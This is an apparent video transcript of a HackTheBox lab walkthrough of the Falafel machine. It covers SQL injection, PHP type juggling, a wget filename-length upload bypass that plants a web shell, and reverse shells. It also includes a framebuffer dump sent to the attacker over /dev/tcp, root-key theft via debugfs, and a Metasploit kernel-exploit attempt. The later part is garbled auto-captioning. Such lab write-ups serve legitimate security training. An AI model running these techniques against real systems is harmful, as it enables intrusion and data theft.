HackTheBox - Falafel
*Note: RationalLove was patched after I did this box, so I mistakenly thought it was still vulnerable. Enjoy the fails/confusion!
01:15 - Begin of Recon
04:25 - Bruteforcing valid users
11:15 - Manually finding SQL Injection
13:13 - Using --string with SQLMap to aid Boolean Detection
15:41 - PHP Type Confusion ( == vs === with 0e12345) [Type Juggling]
18:35 - Attempting Wget Exploit with FTP Redirection (failed)
26:39 - Exploiting wget's maximum file length
33:30 - Reverse Shell Returned
36:19 - Linux Priv Checking Enum
41:00 - Checking web crap for passwords
44:00 - Grabbing the screenshot of tty
49:00 - Privesc via Yossi being in Disk Group (debugfs)
50:15 - Grabbing ssh root key off /dev/sda1
52:15 - Attempting RationalLove (Fails, apparently the machine got patched so my notes were wrong /troll)
01:07:42 - Manually exploiting the SQL Injection! with Python
What You'll Learn
The video demonstrates a cybersecurity walkthrough of the HackTheBox machine Falafel, covering topics such as SQL injection, PHP type juggling, and privilege escalation using tools like nmap, GoBuster, SQLMap, and Metasploit.
Full Transcript
What's going on YouTube, this is IppSec and we're going to be doing Falafel from HackTheBox, which was a really cool machine because it had its own hint system built in, meaning there are things along the way on this box that, if you didn't get them, you'd still be able to make it to the next path, but if you went too far down a rabbit hole it kind of guides you along the right way and gets you out of that rabbit hole. For instance, in the root of the web directory there was a file called cyberlaw.txt. Most people won't include txt in their dir busting, but if you did you get rewarded by it telling you, hey, the username you should play with is Chris. And if you didn't get that hint, well, if you played with the login thing you may notice that it gives you a different error message based upon whether you have a valid username or not, so you could have just brute forced that username. And then once you log in as Chris it kind of tells you, hey, you should do some PHP type juggling, go Google that. If you don't, well, you may just go down a rabbit hole forever with SQL injection. So I really like those ideas of hints to keep you from going too deep in a rabbit hole and just guide you along the path the box should be taken. In addition, there weren't really any unintentional ways to solve the box; he did a really good job at making a box vulnerable but not too vulnerable, and that is actually really tough to do.

So with that being said, let's jump in. First let's run nmap with the flags -sC for default scripts, -sV for version enumeration, -oA to output all formats into the nmap directory and call it initial, then the IP address of Falafel, which is 10.10.10.73. It does take some time, so I've already run it. Looking at the results we see two ports are open: SSH is listening on port 22 and Apache is listening on port 80. Both of these are exposing their version numbers, so we could just Google, let's see, Apache 2.4.18 Ubuntu and get what distribution this is running by going to, I think, packages.ubuntu.com. Yeah, so we see it is running xenial, and if you looked at trusty you can see this is, I think, 2.4.7, and artful is 2.4.27, so we know this is probably Ubuntu xenial. It doesn't really help us outside of just having that knowledge; if it was an unsupported distro then that could lead to things like Shellshock and other things.

But let's just go to the Falafel webpage and see what is in store for us. We see an email address, it@falafel.htb, so maybe IT is a username, or maybe there's something with mail, but we didn't see any mail ports open so I doubt that. Clicking on login we do get a login prompt, so the very first thing I'm going to try is the standard SQL injection, which is single quote OR 1=1. So let's do admin and set that for the password, and we just get "Wrong identification: admin". Trying something else, let's do ipsec and put something for the password, and we get "Try again". So right off the bat we have a way to enumerate usernames.

So let us do two different things for recon. You didn't have to do these to complete the box, but they're there to provide hints, which is my favorite thing. The very first thing we're going to do is a GoBuster, so we'll do /opt/gobuster/gobuster -h. This goes along the lines of I always have some type of recon going in the background, and I'm doing two different recons because these are the first two things I normally do when coming across a site. So let's do GoBuster with the wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt, extensions txt and php because going to the site we see it is a PHP website (we could also do things like .swp and other things to try to find hidden files if someone was using vi in that directory, but we're not doing that for this), then we need -u for specifying a URL to run it against, which is 10.10.10.73, and then we'll do -o to write the results and we'll call this dirbuster.log.

Let's do a vertical split and do wfuzz as well, because we want to enumerate the users on this box since this little boolean thing changed. So let's create a good request, admin/password, and send this over to Burp, turn intercept on, submit, and we can see it is a POST request to login.php with the parameters username and password. To make this easy I want to copy something out of /usr/share/wordlists/SecLists, then we can go to Usernames/Names/names.txt. This isn't on Kali by default, I put it here; if you just Google "GitHub SecLists" you can download it. So what we do is use wfuzz. If we do wfuzz -h, and then just wfuzz, we get some examples of how to use it. The -c stands for color, so I'm definitely going to want to do that. -z is the payload, and in this case it is doing file,users.txt, so it's going to go through all of the lines in that file. Then we have --sc, which is up here, show responses with the specified codes, so they're only showing things with 200, and then the actual URL. You do -d for POST data, which is what we're going to have to do because if you looked at the request it was a POST request. So let's run this: wfuzz -c for color, -z file,names.txt, we'll do --sc as well, 200, http://10.10.10.73/login.php, and we also have to do the -d for data, so put it in quotes: username is equal to FUZZ, and whenever wfuzz sees FUZZ in all caps it knows to pull it from the file, then we can do &password=pleasesubscribe because the password doesn't matter in this case.

When we run it we get a bunch of responses, so I'm immediately going to cancel that. Do wfuzz -h, let's do this quickly. Crap, I know I want to do -h, we'll copy this line, then run this again and we can paste the line. So we want to do not --sc because that's always 200; --sl the lines, --sw the words, or --sh for characters. I grabbed the wrong one, this is show; hide is --h instead of --s, so I'm going to change that --sc to be --hw, so hide words, and we're going to specify 657. So now we have wfuzz running and it's only going to show us responses that are not 657 words. Right off the bat we got admin and we also get chris, so we have two different valid users.

Going back to GoBuster we have interesting pages: robots.txt and cyberlaw. So let's check both of those out. Box is going a little bit slow, maybe that wfuzz is slowing me down; that is obnoxiously slow, I'm going to kill that because there's only two things we wanted, and not sure why Kali is going slow as well. There we go, that sped things up. So let's turn intercept off, go back to Firefox and let's check robots.txt: nothing there. We can do cyberlaw.txt and we can see a message that says a user named Chris (so that's how we could also have gotten the Chris name if we didn't want to brute force it) has informed me they could log into my account without knowing the password, then take full control of the website using the image upload feature. So now we know there's probably going to be an exploit in some type of image upload, and they can log in to an account without knowing the password, and yeah, that is about it.

So let's try logging in with Chris and just common passwords. Let's see, well again, let's do chris/password, don't get anything, admin/password, and just trying default things. You could set this up to go to Hydra; if you just YouTube "IppSec Hydra" you'll find an example of how to do that. We're not going to be doing that, we're going to play with different SQL injections. So in the spirit of always running recon in the background, we're going to exit wfuzz and run SQLMap. Let's go back to Repeater; we did not record that, so try to log in, forgot to set intercept on, submit, this goes into Burp, send this to Repeater, highlight, copy the file, and we can do login.request. What that allows us to do now is just do sqlmap -r login.request, we can do --level 3 --risk 5 and -p, we want to do the username parameter and password parameter. There was usernames, right, username, and I got these backed up, risk 3 level 5, and we'll also add, I think it's --batch so it doesn't ask us any questions. So let that go in the background, and we'll label this window SQLMap, and while that goes let us try our own.

So if we do admin single quote, let's turn this to never remember, and again Burp intercept off. It's not showing anything, "Wrong identification: admin", that was weird, single quote didn't change anything. Nope, it did, it was just Burp intercepting. So if we do admin single quote and then a comment, we're still getting "Wrong identification", so it looks like there's some type of SQL injection here. So if we do admin' UNION SELECT 1 and then a comment, we get "Hacking attempt detected", so we can't do UNION statements. We could try doing a comment here and then fuzzing it, we just get "Try again", and we could go up to a few to see if we can get UNION injections working. I think you could do %0b as well instead of these comments, but that doesn't work. So all we know is there is some type of boolean injection with this SQL, and I'm going to let SQLMap finish so you can see that, without specifying the boolean thing, SQLMap will miss this. So we'll just let this finish.

So SQLMap finished and it found absolutely nothing. So let's go back to the logic: if we do admin and then the dashes we get "Wrong identification", so I'm going to copy "Wrong identification", whoops, go back to our SQLMap, let's look at login.request, the username is admin, so that is crucial, and we're going to just do --string and then "Wrong identification", and that's going to tell SQLMap that on a successful inject the page is going to say "Wrong identification". So now it can complete its boolean logic and determine what's good and what's bad. And to speed this up I'm just going to do --dbms mysql because it's a MySQL database and we don't want to run checks for everything. So running this, and we can see it should find it relatively quickly, and what this is going to do, there we go, it did find it. So it's doing essentially username is admin and password is like, and then something, so that's kind of what the query looks like, and then you just filter it based upon the very first character. At the end of the video I'll probably go back and do this manually so you can see exactly what happens, but for the sake of time up front we're just going to use SQLMap.

So SQLMap found the vulnerability, so we're just going to do --dump and it's going to retrieve everything one character at a time. We see username, password, role, so it just dumped the table and now it is dumping the password. So for ID number one, that is the admin, he has an admin role, and ID number two has a different hash and he's a normal account, that is Chris. It's now attempting to crack the hashes, and notice it's not prompting us for anything; that's automatically going, do you want to do the dictionary based attack, it says yes, do you want to do common password suffixes, it sort of defaults. Oh no, that's because I did the batch option, so let this go a little bit quicker; the batch just means always choose what is default. Should come back with the result any time now. There we go, we got the cracked password "juggling" for Chris. So let's try logging in while it keeps trying to crack root's password. So if you do chris, well again, with juggling, login successful, and we are going to a new page that just says "Chris: juggler by day, hacker by night", and there's a lot of references to juggling, so this is PHP type juggling.

So the very first thing I did when I saw this was I went to Repeater and tried making username an array, and then we go down and we just get invalid username/password, so I ditched that and then went back to the hash for admin and noticed it was 0e. When PHP sees 0e it converts that into a number because it thinks zero exponent, so that 0e-whatever is being treated as 0 to the whatever power, which is always going to equal 0. So as long as we can find a collision that begins with 0e it's going to work, and that works only if the PHP code is like num is double equal to 0e-whatever. PHP has a triple equals that makes it so you can't do type juggling; if it's triple equals then it's not going to treat that right side or left side as an integer number, it's treated as a string. So let's just Google for "PHP 0e hash collision" because we're just looking for any MD5 hash that begins with 0e. Go to this Hacker News thing, and once this loads we'll see if this has a page. There we go, so we got echo -n with one of those strings. So let's go to this, log out, log in with admin with that hash, or that password, we get login successful and we go to a page. Just to verify that it is because of the juggling we're going to do a different one, we'll do this bottom one, we can do admin and then paste this and we get login successful. You may have done this without doing the type confusion, because once a box is live for so long people are going to post stuff about it online; if you just Googled the hash you would have got that the password is king of falafel. So that is what people are doing the hash collision against; king of falafel was, I think, the actual intended password for that user, maybe just a huge crack got that one.

So once logging in we go to this upload-via-URL page, so it's telling us, hey, specify the URL of an image to upload. So my very first thing to do is set up netcat; there's no longer SQLMap, we'll just say bash and listen on port 80, go to this page and make it connect back to us, and my IP is 10.10.14.30, and clicking upload, maybe I'm not 14.30, no, "bad extension", we need an image file. So we do http://10.10.14.30/ipsec.gif, and going back to the terminal we see wget 1.17.1. So when I see this I do searchsploit wget, and this is going to be a little bit spoiled: this actually won't work, I'm not sure why, that wget version should be vulnerable. I'm guessing the distro had patched it and didn't update something like the version information, because this certainly should have worked. So if we look at this exploit, let's just make the directory wget, I guess, and then searchsploit -m to mirror this and copy that text. This is very much like, I forget what box it is, there was a box where wget was used as a privesc; if you just YouTube for "IppSec wget" you'll probably find it.

Let's see. So what happens is wget follows redirects, so if you do a wget against a page and it redirects you to something else, wget will follow that and download that content. There was a bug where if it redirected you to an FTP page it could actually serve you a different file name. So what we're trying to do is trick this into having a URL that ends in .gif and downloading an actual .php file. This proof of concept actually led to code execution because they were writing it into the root directory. If we go back here we can see, we have to view source, go to the bottom, we can see just before it it's changing the directories, then doing a wget, so it may not work that way. And then I had also, not to go through a hundred different tangents, but I also tried things like -O http://10.10.14.30/upload.ipsec.gif, and that -O is output file, so we'll do ipsec.php, and it requires it to be a URL and it also requires that on the server side, so I don't think it's vulnerable that way.

The proof-of-concept exploit, see, that is just creating the initial file to download, and here we go, we want to start copying this. I want to scroll down, that's odd, copy, select, I guess it won't go down when I'm in vi, so let's just cut that, then go up to where we were, see the Python code, select, copy it down to the very end, hit enter, and we can do exploit.py, set paste, paste it in, and we just edit this a little bit to work because it's trying to create a .wgetrc file. So right here on this, do GET, and it's redirecting to anonymous .wgetrc, we don't want that, we want to download the file ipsec.php, redirect to the new location, that should be fine. The POST request, we're not actually doing anything, this is for when it actually tries to get the code execution. HTTP listen port or IP, let's change this to 10.10.14.30, this to 10.10.14.30, root drawn, and we need FTP, so let's just grab that thing, I think it's pyftpdlib, for a quick FTP server, and we'll have to create the file ipsec.php, and I'll just echo "please subscribe". I'm doing echo first because if PHP safe mode or something is on, I'm just doing a super simple PHP thing to tell if it works before I jump to the unsafe functions like code execution. So start the FTP server, then we want to start the web exploit, we have to go into the wget directory, start that. If we wanted to we could test it out: if we do wget localhost/asd we get connection failed because, I don't know, wget 10.10.14.30, maybe I don't have localhost in my /etc/hosts file. Again, there we go, and we can see the request redirected us to FTP to download a PHP, logged in, downloaded the file, but still saved it as asd because my wget version is patched. If we had done, I think it's --trust-server-names, is that it, there we go, that is the argument if you wanted to still trust whatever the server gives you, and it now saves ipsec.php. But let's remove those and then run it against the actual box and see what happens. We can just upload this again, we see it served the file and FTP attempted to host it, so going to this output, go to the bottom, we can see it retrieved ipsec.php but still saved it as ipsec.gif, and if we go to uploads/whatever, let's see what we see if we get to that file. So nothing too interesting there, and we can't get to uploads either.

So at this point you should go back and poke around at other things. If you click on the profile for admin you would have seen a hint that says "know your limits", so that is hinting at wget having a maximum character length. So what I did was Google max character length Linux, I forgot, file name, but we get Linux has a maximum file length of 255 characters. So what I did, let's kill this wget stuff, was do a pattern_create for 255 characters. So I'm going to locate pattern_create and just paste this, -l 255, I think was the max characters, so what it said, yep, 255. So copy this, we'll make a new directory called www, since we're no longer doing that wget exploit, and then touch that, vi, edit "ipsec was here", and then python -m SimpleHTTPServer 80. Actually we need to do .gif, it has to be ending in an image, so we'll do 1234.gif, crap, need to fix the file names, there we go. So now we have this long file that ends in gif. Do this, and I suppose if we wanted to we could even, if we do file against that it thinks it's ASCII, so if we add the magic bytes for a gif, what's that, working in vi, huh, tab autocomplete's not working on that file, that is bizarre, but add GIF8, that is the magic bytes, works with file. Maybe you can't vi a .gif and that's why it's not. Now file thinks it's a gif, so if there was that type of check in this application we would bypass it. And we start the web server, go back to Falafel, upload, paste that and put the URL as 10.10.14.30, upload, we see it downloaded the file, and if we look at the results we see "the name is too long, 255 characters total, trying to shorten", so new name, let's see what this is. This is the new name; notice it got rid of that .gif, and we can do echo -n to make sure it occurs without the line break, because that gives us an extra character, then wc -c to count the characters, we see 236. So everything after 236 characters just got cut off.

So what we can do is take this, or we can just do python -c 'print "A"*232', because we want to include an extension which will be .php. Copy this and then vi that .php.gif and then do a shell, so cat shell.php, or do cmd.php, copy, paste, save, did all right on a SimpleHTTPServer. So what's happening here is all this up to here is 236 characters, and that is the maximum length wget is going to take, and it's going to cut off everything after that, which is the .gif, and the application, when it sees that string, is going to see it ends in .gif and pass the check. So let's test this out. If we go back we can put the URL http://10.10.14.30/ plus that long file name, upload it, Ctrl+U so we can see the source, and we can see "saving to", let's see what the new file name is, all A's .php. So if we go into upload/ this directory, let's get rid of, oh we can leave view source, it's fine, go into that directory and then paste the file name of all A's .php. We get the file, it does exist, and we can do a command like, am I live, do ipsec equals whoami, and we get www-data. So there we go, we got the code execution.

So now let's send this over into Burp so we can easily manipulate what commands we send, so turn intercept on, refresh the page, send to Repeater, and then let's convert this into a POST request because POST requests have less URL filtering things you have to worry about. So let's change request method and go to the reverse shell cheat sheet to find a shell; before you do that turn intercept off. Fantastic, reverse shell cheat sheet, and try this very first one first in Repeater, I think I just pasted it twice, there we go, 10.10.14.30, we do it on port 9000, and nc -lvnp 9000 to listen, click go, okay, we didn't get anything. Let's do URL encoding with Ctrl+U, go, immediately get something back, nothing there. So let's move down the list and try a different reverse shell. Normally when that fails I try netcat, and before we do that we can just do which and see it does exist, so paste this in, 10.10.14.30 9000, Ctrl+U to encode it, click go, nothing immediately back, because if we look we have a shell. If we do hostname we have falafel. So let's do python -c 'import pty; pty.spawn("/bin/bash")', python's not found, so python3 -c and copy and paste, there we go, and then let's make it so we have tab autocomplete by backgrounding with Ctrl+Z, stty raw -echo, fg, there we go. And if we do clear, anything, it doesn't work because the TERM environment variable is not set, so we'll do export TERM equals, we'll say screen, and now we can clean up the screen a bit.

The first thing I want to do is run linuxprivchecker, so let's copy that, so cp /opt/LinEnum/LinEnum.sh, just because it doesn't have Python 2, and the copy of linuxprivchecker I have is Python 2, not Python 3, and errors out. So doing it with LinEnum, and then we can host that and then we can just curl 10.10.14.30/LinEnum.sh and pipe it over to bash. There we go, and while that runs let us grab linuxprivchecker, or not, Linux Exploit Suggester, that's what I wanted to say, and I normally grab a new copy every time I do it because, well, updates happen frequently to these types of scripts. So Linux Exploit Suggester, I never want to use what's on my hard drive just in case an update came, and this Linux Exploit Suggester, I haven't seen that one before, what are you? Let us see real quick, I bet this is Python, Perl, and go away, I don't feel like dealing with Perl. So the very first thing I always do is click on the forks and see if there's any more up-to-date ones, and it looks like there is; there is this C. Morris who has been committing quite a bit, and this guy has a more recent commit, but it don't impress me much because, well, I like seeing commitment, and C. Morris definitely has more updates, so we'll do this because it looks like he's adding things as he goes. So we switch to his repo, click back here, and now we can just do a git clone, and let's see, we cd in here, I hope you can just run this bash script and don't need everything, file, what is that, unless it's other stuff, let's just copy this and hope for the best. Looks like this guy made it a little more complicated. So that scan is complete, we can do the same thing with linux-exploit-suggester.sh, forgot to pipe it to bash, and while that runs let's go to the very top and look through our LinEnum.sh.

So these are two different privilege-check ones. We see it is running Ubuntu xenial, we had known that already. Users: we have yossi logged in, and he's logged into a physical terminal, tty1; we can see moshe, I don't know what that is, is logged into the pseudo terminal, but someone's logged in physically to this box. Users on this box, sample entries, permissions, home directory contents, html has one because of www-data, I think root is allowed to log into this box, available shells, not interesting, nothing too interesting in crontab, looking at it it's not really talking to anything, we can see tcp and MySQL as listening ports, look at SUID files, it looks like nothing is out of the ordinary, only root can read the password file. So we're not coming up with a whole lot of things here, and that is the contents of the exploit suggester. So let's see, it is telling us that it is vulnerable to this CVE, looks like it's saying a lot of CVEs it's vulnerable to, so maybe we needed to copy all the scripts, but this 2018 CVE is interesting since I think this box was released in 2017. We do uname -r, or do uname -a, and pull up this kernel's build, copy, paste this in, paste that in, copied, freaking HTTP, see, do that with Ubuntu linux-image, this is probably it, when was this released, does this have a release date, it doesn't, but if you got a release date and you saw it was before this then you can assume it is vulnerable to the CVE. So let's just copy this and add it to notes, so we'll come back to that again at the end of the video, because that isn't the intended way to privesc; the intended way is we've got to find a way onto a different user.

So we are www-data, we do id, that shows us that, so whenever you get a web application the first thing I generally do is go and look at the SQL password. So I'm going to guess the SQL password may be in connection.php, and we see it's logging in to the SQL server, 3306, as moshe with the password falafelIsReallyTasty. So we could just su moshe and do that and log in that way, but since we're not on a real terminal I'm just going to try to SSH straight in as him, so moshe@10.10.10.73, set the password, there we go. So we can get out of this web shell; it doesn't look like it wants to exit, so we'll just ignore that, we can kill that pane and not close it cleanly. And now we could get that user.txt file, so if we do wc -c user.txt we can see it is 33 characters, because there's a line break in there which makes it that extra character. I'm going to type bash so now I have that tab autocompletion; it is really annoying not having that. And we could run linuxprivchecker again, I'm going to run just id, and looking at it we have a weird group, we're a part of video, and I see that's weird because you normally don't see that, and it does signify that you can read the monitor output. And we saw that the yossi user was logged in physically to the box with the tty, so that generally won't happen in HackTheBox machines because, well, it's physical, you'd have to pull up the KVM, so it looks like there's some type of auto-login or that user's doing something physically on the box.

So let's dump his monitor. It's actually a device in /dev, I think it's fb, I forget what fb stands for, but there we go. So if we open a new window we can do nc -lvnp, we'll listen on port 9000 again, and say this is going to be fb.raw, and then we can cat /dev/fb0 and pipe it to /dev/tcp/10.10.14.30 and then the port 9000. So we're sending the contents of /dev/fb0 to a netcat session, and that netcat session is going to redirect it to a file and save it. So there we go, it saved that file. If we do file on fb.raw we can see it's Targa image data, so let us try to open this with, and there's probably other applications to open it with, I'm just using what I know, and we can do Documents/HTB/boxes/Falafel, and it's not here, we have to select the file type and say it is raw image data, and instead of all images change to all, and do fb.raw. When we open this we get a bunch of garbage, and we can try changing it to all different sorts of things, it doesn't work, and that is because it doesn't have the resolution correct. So on this we have to cat the /sys/class, I don't know what it is here, so let's do cd /sys, find . and grep for fb0. It's this class/graphics, let's see, devices could be devices, name, power, dev, pan, mode, yeah, I think it's in devices, so cd devices/pci0000:00, let's just copy this, I'm sure it's symlinked somewhere, maybe it's symlinked to graphics, maybe that's why it shows that, this class/graphics, cd, yeah, it's linked here. So a quicker way to type it, you could have just copied and pasted that long string or done this, and you can verify that by ls -la, I won't worry about it, yeah, we can see the symlink here that it is going to that. So we go to fb0 and list the different things, let's see, we got bits_per_pixel, let's see what that is, that is set to 32, we got mode, what is mode, blank, virtual_size, we can see 1176 by 885, this is the actual resolution. So if we go back to that we can say 1176, and we want 885, and this also, if we do 32 does anything happen, not really, let's just do one and open. We can see the actual contents of the monitor, and he's trying to set the password to "Moshe please stop hacking me", exclamation point, and user doesn't exist, and then he changed the password. So we can assume that yossi's password is that, MoshePlzStopHackingMe!, so let's su yossi, MoshePlzStopHackingMe!, and we can log in. So I'm going to close this out because I like everything to be clean, and we're going to open up a new thing, so this will be moshe, and open a new SSH as yossi@10.10.10.73, put the password, okay, ls -la, there's a .bash_history, so let's check that out, oh, it's zero bytes, no point in checking it out.

So it's now actually him, so let's see what can we do here. We do id, we can look at what is different here, and we see that this user is a member of the disk group, and the disk group actually owns the hard drive, so you could strings /dev/sda1 | grep root.txt and it would eventually find it, maybe it's sda5, it's one of these disks, there we go, it's finding some stuff, but that could take a while. So there's also a program called fsdebug, I think, what is it, locate debug, that's not what I wanted, shoot, what is it, debugfs, there we go. So there we can do debugfs /dev/sda1, we do ls in here, we can see different directories, so we do q to exit that, we can go into root, do ls, and we can see root.txt, we also see .ssh, so I'm going to go into .ssh and then do another ls and see that there is an authorized_keys file and id_rsa. So I'm going to grab that, and we're going to cat id_rsa, grab this file, name this guy yossi, and then a new one, and create root.key, paste the id_rsa file, chmod that to 600, and then we can ssh -i root.key root@10.10.10.73, and we are now root on Falafel. If we do wc -c on root.txt we see it is 33 characters, and of course one of those is the line break, the rest of that is the MD5 hash. So that is the way to do this box.

If you wanted to, you go all the way back, and let's get the shell on port 9000 again and let's do the kernel exploit. So python -m SimpleHTTPServer 80, we already have that, nc -lvnp 9000, go to bash, replay this, got the shell, python3, let's get a proper pty, okay. So let's go to /tmp and let us download that actual exploit. So we do cat notes, we see CVE-2018-1000001, so it's searchsploit, can we look for that, we sure can't, so let's Google that POC and we get one here, so let's go to the top result first and try this out, RationalLove, good, raw, we could clone it or just copy and paste, vi RationalLove.c, set paste, paste it in, go to the top and let's see if there's any compile instructions, doesn't look like it, just -o to say an output name. So let's try this, we can just do gcc -o RationalLove and then specify the file. Did not find it, I think it has to be in www, is that where I put it, it's not where I put it, oh, I didn't do it since I pasted it, crap, let's go back here, copy everything, that's why it asked me to save, I thought I had just downloaded it, it's not, paste right into set paste, there we go, gcc -o RationalLove RationalLove.c, looks like it compiled just fine. So let's move that into www and then we can go to a shell, curl -L RationalLove 10.10.14.30/RationalLove, ls, looks like a copy, chmod +x and then execute it, and it is attempting to gain root, see if it does, escalation failed. See if we can do something to make this work; maybe it needs that PID flag, so let's see what it was talking about with PID: "may also try the PID for ... if you want to test the program on an existing namespace or chrooted mounts". Not sure exactly how to find the namespace or whatever mount. ps -ef, grep root, I shouldn't see a true, yes, yeah, grep true, is that running anywhere, no. Let me do RationalLove PID 6789, I guess, let's not do that one, let's do 6825, 6787, see if that works, nope, just try this again, see, it wants us to have this set to one, I guess once this vanishes it should have been vulnerable, let's cat this, that is set to one. Let us look back at this exploit, don't need that, let's see, one, two, is any, Ubuntu 16.04.3, cat /etc/lsb-release, 16.04.3, libc version 2.23-0ubuntu9.4, I want that, the ubuntu10 is throwing it off, maybe we don't have the correct offset, let's see, I have no idea what it's doing, Linux Mint has one less, let's see, and Debian stretch, yeah, I actually have no idea how this exploit is working, but it certainly is not working for us. So let us try, I guess, doing it with Metasploit, maybe Metasploit has a better offset for us. So let us, I need to just msfconsole, actually let's start Postgres, service postgresql start, well that works, whoops, keeps pointing the wrong way, see ya, msfconsole, and we can do msfvenom, grep for linux, and we want to do --list, one of these, we'll finish first, and we'll begin setting up the handler, okay, use exploit/multi/handler, set LHOST tun
zero set L port - lets do ninety ten search there we go let's see we want Linux probably x64 if we have it there we go x64 meterpreter let's do this one MSF of atom - P hello host equals ten ten fourteen thirty four equals ninety ten - F elf - OH call this which output I guess payload sequel to their head search whoops set show options verify it's all there looks good start the handler base64 and code this to quickly send it v well just to Matt paste base64 - d-mat chmod plus X and now we got a meterpreter session I should have made sure we had the payload for this first let's do search rational love rational I do not have rational level my Metasploit that is awesome national love Metasploit because way there was a module for this rapid7 source-code G Lib C real path probe ask that's why one search G Lib C real do not have that wonder how old my Metasploit is okay yep certainly do not have that see that's good hop we will just redownload Metasploit thought i didn't update on my cali more recently then oh three days ago get clone one can hope that it's just not in the dist half depository yet so once this get finishes hopefully we can just MSF console within this I don't we don't run this off of get so we'll find out okay we have downloaded it so let's go into it we can find dot let's grab for G Lib C real okay we definitely have it he's cute MSF console bundle install let's update everything hopefully this doesn't screw over my whole Cali never know it probably just killed my existing mat Metasploit well this is awkward the gem bundle install failed can we do it myself console and hope for the best if not I guess we'll blindly run this next command nope gem install fales can I go back and still run I myself console yep looks like we still do Metasploit so let's see let's locate where MSF console is probably in user bin unfortunately okay where does Kali install Metasploit locate Metasploit let's see we'll do locate exploits windows use a share let's grab - B 
exploit DB because that's all search poit stuff so we can find a copy out of user share Metasploit framework and will delete modules plugins and scripts and hope for the best scripts I think those are the order data as well and then we will copy out of opt Metasploit and you should probably never do this no idea what's going to happen so we'll copy modules copy plugins copy scripts and we'll copy data MSF console and oh man we got a lot of errors for I guess OS X stuff I guess it's only OS X so it doesn't bother us hopefully so exploit multi handler el host hell port payload exploit we're on meterpreter and search gee Lib see real cash hasn't been built yet I guess that's a good sign it is searching for that module and we now have the module so let us use this and I guess hope for the best so options set do we have compiled I guess we can just leave everything to default first set session to one run and let's see what happens exploit failed failed to validate session so options session is 1 sessions is 2 I wonder why that's that Ron God darn it we have to set L host Don zero do it twice for good measure and we started the Hamlet writing the exploit and launching it and it doesn't look like it worked I'm assuming we would have got a callback like near immediately exploit completed with no session created is there anything in Advanced Options doesn't look like it so I just screwed up my Metasploit for almost no reason at all since this did not work what if I set compiled a false if it pre compiles it cuz I don't think this box had GG gdb right yeah to a GCC it's that compile false run anything different gonna happen nope so I'm not exactly sure why this box isn't vulnerable I'm guessing it some weird offset thing maybe I'll come back to it if I find out before I release his video but we're going to ignore all of that I guess sorry I guess exploits don't always work and as I say in almost every video I should do more time prepping to make sure all this stuff works 
before I start playing around but yeah oh well let's just create a new window and start with the Python stuff so make the directory Python and we're going to go back to the SQL injection and do this manually okay so let's do this the first thing we have to do is actually reinvestigate this SQL injection so we can understand it so I'm going to go to the login tab my repeater and we're going to do the SQL injection if you remember we did admin we can see this size is seven thousand three hundred and ninety three bytes and that just says wrong identification admin and if we put something else like my name hip sack we're gonna see seven thousand three hundred seventy six bytes and that says try again so whenever we see 93 here we know the query was a success I just don't feel like scrolling all the way down every single time so go back to admin ninety seven thousand three ninety three so that's good then when I add a single quote and we get seven thousand three hundred seventy-six because we don't have a comment the SQL and query failed it was like select star from users where username equals admin and password equals I have admin here as well so these are probably in single quotes and what we did was we injected an admin and added a single quote which quaid creates a unequal number of quotes so when we add the comment and he raises all of this and that becomes a valid sequel query so we're going to do exactly that and we can see it's back to seven thousand three hundred ninety three bytes so now we have to do and password is like and if we did star like we did earlier it's an error message three hundred and seventy-six because star is not the wild character in SQL percent is ninety three so we'll get there and if we did zero because we know the admin begins with zero we still get 93 now the next character is e if we didn't put E and put a we get the error message seven thousand three hundred and seventy six bytes if we do e we get seven thousand three hundred ninety 
three so we can also do a substring command so a sub STR and that's going to pull a character by character out of password so substring password we want to pull the very first character and then the next thing is how many characters so if we did one here we're only going to pull the very first character and we can change that like to be an equal so the very first character a password and only grab the first that's what that second one means and we get seven thousand three hundred ninety three if we change it to be the second character and only grab one character it's going to fail 376 if this o was an e it's going to pass so that is the logic behind this SQL injection so let's go over to a Python script and create SQL and Jack by and the first thing we're going to do is input the request module this allows us to easily create a Python request and we're going to do cares is equal to we can just do 0 1 2 3 4 5 6 7 8 9 then ABCDEF there's the valid ones in a md5sum it's just tax characters and if we do foresee and it cares and print C we do Python 3 SQL inject we're looping through every character we also want to do a function or do def get SQL I for index C for the character and we're going to return admin then single quote and substring password % s this can be the very first variable and that's going to be the index one because we only want to get one character equals percent s and then a comment and then we do a percent I comma C and that means the eye is going to go into the very first percent s right here and the C is gonna go into the second percent s right there so we can do now for C n cares let's do print get SQL we'll just get the first character every time and C and we have to close out that print Python 3 and we can see the SQL injection trying every single character so now we have to create the actual request so we're going to do for I in range 0 32 and if we print I here I've got Python 3 we go 0 to 32 we actually don't want that we want one because the 
very first character is going to be one so from this now we can do a four-seat and cares so what this going to do is loop over every character in the password then loop over every character in a list and I'm using tabs oh well spaces sure you use but yeah tabs are work injection is equal to get SQL I see so this is going to just create a variable so it's easier to read and that's going to create this as a string then we can do payload is equal to and we have to create this as a dictionary I think that's correct to them because that's just what a request module wants for a post request so the username parameter is going to be equal to injection and then the password parameter can be equal to anything will do please subscribe to keep it like well we always do and I'm gonna keep using the same quotes I don't know why I change them there okay then we can do our for the request module equals request post HTTP 10 10 10 73 falafels IP address login dot PHP and then data to make this a post request is equal to payload okay then we can do if wrong identification in our dot text print the character and we'll just do that for now so we can see exactly what it looks like and make sure it works a request has no attribute posts its post there we go 0e 4 so that's working it's printing one at a time and this is why I like Python 3 because when you just do and is equal to that which is nothing and then flush is equal to true so now when we run this it just puts it all on one line and they can go and optimize this a little bit and break after the very first match because this is looping all the characters and once it hits a successful character it's going to continue to loop bring this break here is going to make it exit the first loop and then just go to the next character and then after this we can print a break line and let's go oh that did not work C comma and that should have worked let's see it's probably got some type of line break by default when it does elute this way so 
